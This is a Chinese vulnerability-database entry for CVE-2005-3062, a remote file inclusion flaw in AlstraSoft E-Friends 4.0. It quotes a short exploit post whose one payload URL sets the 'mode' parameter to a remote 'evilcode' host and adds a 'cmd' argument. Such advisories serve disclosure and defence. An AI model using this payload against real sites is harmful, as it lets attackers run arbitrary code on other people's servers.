AlstraSoft E-Friends index.php远程文件包含漏洞

AlstraSoft E-Friends index.php远程文件包含漏洞

漏洞ID 1197773 漏洞类型 输入验证
发布时间 2005-09-27 更新时间 2005-10-20
图片[1]-AlstraSoft E-Friends index.php远程文件包含漏洞-安全小百科CVE编号 CVE-2005-3062
图片[2]-AlstraSoft E-Friends index.php远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200509-257
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2005090019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-257
|漏洞详情
AlstraSoftE-Friends是一款商业交友系统。AlstraSoftE-Friends4.0中的index.php脚本存在PHP远程文件包含漏洞,远程攻击者可以通过mode参数来执行任意PHP代码。
|漏洞EXP
AlstraSoft E-Friends Remote command exucetion

Site : http://www.alstrasoft.com/efriends.htm

Description :

AlstraSoft E-Friends is an online social networking software that allows you to start your own site just like Friendster and Tribe.net. The E-Friends software allows members to connect to people in their personal networks and community, creating a new online interactive resource that is based on a trusted network of friends and associates on the internet.

Members can use this abundant network to make friends, find their love ones, locate jobs, buy and sell stuff, locate a roommate, and accomplish much more with the help of groups and individuals who they know and share the same interests.

With our new 4.0 release, you can now start a profitable social networking business by creating custom membership packages using Paypal payment gateway. In addition, we have added several new exciting features including online blog, forums, text-based chat, events and many more! Enhancements are also added to the admin backend and with our integrated banner ads system, you can earn extra income by publishing paid banner ads on your E-Friends site.

Vulnerable: http://www.ownz.net/index.php?mode=http://evilcode?&cmd=

Solution : no :P

Contact : khc (at) bsdmail (dot) org [email concealed]

Kurdish Hackers Clan!
|参考资料

来源:BID
名称:14932
链接:http://www.securityfocus.com/bid/14932
来源:SECUNIA
名称:16941
链接:http://secunia.com/advisories/16941/
来源:SREASON
名称:22
链接:http://securityreason.com/securityalert/22
来源:BUGTRAQ
名称:20050924AlstraSoftE-FriendsRemoteCommandExucetion
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112758134227112&w;=2

相关推荐: Lawson Financials Account Credentials World Accessible Vulnerability

Lawson Financials Account Credentials World Accessible Vulnerability 漏洞ID 1101187 漏洞类型 Configuration Error 发布时间 2002-12-02 更新时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享